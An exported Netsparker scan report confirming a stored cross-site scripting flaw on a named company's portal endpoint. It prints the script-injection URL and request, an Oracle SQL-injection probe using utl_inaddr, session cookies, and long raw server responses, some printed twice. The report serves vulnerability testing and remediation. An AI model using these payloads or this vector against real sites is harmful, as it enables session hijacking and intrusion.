XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript InjectionNetsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
1
identified
1
confirmed
0
critical
0
informational
|
||||||||
GHDB, DORK TestsGHDB, DORK Tests
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
IMPORTANT
100 %
|
|
Permanent Cross-site Scripting
Permanent Cross-site Scripting
1
TOTAL
IMPORTANT
CONFIRMED
1
Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.
Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.
Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
- User session sensitive information such as cookies can be stolen.
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /spportal/spportalFlow.do
/spportal/spportalFlow.do CONFIRMED |
Injection URL
https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00029D)%3C%2Fscript%3E
Injection Request
GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00029D)%3C%2Fscript%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; JSESSIONID=5FC711EA2C1E825265587058E8CD3997.app5-a1; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; JSESSIONID=5FC711EA2C1E825265587058E8CD3997.app5-a1; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate
Identification Request
GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; JSESSIONID=5FC711EA2C1E825265587058E8CD3997.app5-a1; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; JSESSIONID=5FC711EA2C1E825265587058E8CD3997.app5-a1; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate
Injection Response
HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Thu, 03 Feb 2011 18:59:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Location: https://www.supermedia.com/spportal/myaccount.do
Content-Language: en
Content-Length: 0
Connection: close
Server: Unspecified
Date: Thu, 03 Feb 2011 18:59:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Location: https://www.supermedia.com/spportal/myaccount.do
Content-Language: en
Content-Length: 0
Connection: close
Identification Response
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 18:59:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6031
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages - Error</title>
<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="No Such Flow";s.prop7="No flow execution could be found with key '_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537 '"--></style></script><script>netsparker(0x00029D)</script>' -- perhaps this executing flow has ended or expired? This could happen if your users are relying on browser history (typically via the back button) that references ended flows.; nested exception is org.springframework.webflow.conversation.NoSuchConversationException: No conversation could be found with id '47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D' -- perhaps this conversation has ended? ";s.prop8="";s.prop9="";s.prop10="5FC711EA2C1E825265587058E8CD3997.app5-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >
<!-- Header Start -->
<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">
</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->
<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->
<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>
<!-- Atlas Code End -->
<div id="header">
<div id="top">
<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>
<div id="utility_nav">
<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>
</li>
</ul>
</div>
<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone (866) 311-4186</span>
</div>
<div id="globalnav">
<ul id="globalnav-list">
<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>
</ul>
</div>
</div>
</div>
<!-- Roll-over navigation menus -->
<!-- Header End -->
</div>
<div id="content-shadow" >
<div id="content" >
<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Badly formatted flow execution key ''||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||'', the expected format is '_c<conversationId>_k<continuationId>'
</div>
</div>
</div>
<div >
<!-- Footer Start -->
<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>
<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>
<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>
<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/ecommerce">Online stores</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>
<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();
//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);
//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownTimer();
});
});
</script>
<!-- DROP DOWN END -->
<div id="footer" >
<div id="sitemap">
<div class="block first">
<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Press">Press</a></li>
<li><a href="http://ir.supermedia.com" title="Investors">Investors</a></li>
<li><a href="https://www.supermedia.com/careers" title="Careers">Careers</a></li>
<li><a href="https://www.supermedia.com/social-responsibility" title="Social Responsibility">Social Responsibility</a></li>
<li><a href="http://my.supermedia.com/directoryoptout" title="Directory Opt-out">Directory Opt-out</a></li>
</ul>
<h4>Client Solutions:</h4>
<ul>
<li><a href="https://www.supermedia.com/client-solutions/client-stories" title="Client Stories">Client Stories</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-service" title="Local Services">Local Services</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-retail" title="Local Retailers">Local Retailers</a></li>
<li><a href="https://www.supermedia.com/client-solutions/web-based-business" title="Web Businesses">Web Businesses</a></li>
<li><a href="https://www.supermedia.com/client-solutions/national-brand-agencies" title="National Brands & Agencies">National Brands & Agencies</a></li>
<li><a href="https://www.supermedia.com/advertising-goals&quo..
Server: Unspecified
Date: Thu, 03 Feb 2011 18:59:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6031
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages - Error</title>
<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="No Such Flow";s.prop7="No flow execution could be found with key '_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537 '"--></style></script><script>netsparker(0x00029D)</script>' -- perhaps this executing flow has ended or expired? This could happen if your users are relying on browser history (typically via the back button) that references ended flows.; nested exception is org.springframework.webflow.conversation.NoSuchConversationException: No conversation could be found with id '47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D' -- perhaps this conversation has ended? ";s.prop8="";s.prop9="";s.prop10="5FC711EA2C1E825265587058E8CD3997.app5-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >
<!-- Header Start -->
<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">
</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->
<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->
<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>
<!-- Atlas Code End -->
<div id="header">
<div id="top">
<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>
<div id="utility_nav">
<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>
</li>
</ul>
</div>
<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone (866) 311-4186</span>
</div>
<div id="globalnav">
<ul id="globalnav-list">
<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>
</ul>
</div>
</div>
</div>
<!-- Roll-over navigation menus -->
<!-- Header End -->
</div>
<div id="content-shadow" >
<div id="content" >
<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Badly formatted flow execution key ''||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||'', the expected format is '_c<conversationId>_k<continuationId>'
</div>
</div>
</div>
<div >
<!-- Footer Start -->
<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>
<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>
<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>
<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/ecommerce">Online stores</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>
<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();
//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);
//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownTimer();
});
});
</script>
<!-- DROP DOWN END -->
<div id="footer" >
<div id="sitemap">
<div class="block first">
<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Press">Press</a></li>
<li><a href="http://ir.supermedia.com" title="Investors">Investors</a></li>
<li><a href="https://www.supermedia.com/careers" title="Careers">Careers</a></li>
<li><a href="https://www.supermedia.com/social-responsibility" title="Social Responsibility">Social Responsibility</a></li>
<li><a href="http://my.supermedia.com/directoryoptout" title="Directory Opt-out">Directory Opt-out</a></li>
</ul>
<h4>Client Solutions:</h4>
<ul>
<li><a href="https://www.supermedia.com/client-solutions/client-stories" title="Client Stories">Client Stories</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-service" title="Local Services">Local Services</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-retail" title="Local Retailers">Local Retailers</a></li>
<li><a href="https://www.supermedia.com/client-solutions/web-based-business" title="Web Businesses">Web Businesses</a></li>
<li><a href="https://www.supermedia.com/client-solutions/national-brand-agencies" title="National Brands & Agencies">National Brands & Agencies</a></li>
<li><a href="https://www.supermedia.com/advertising-goals&quo..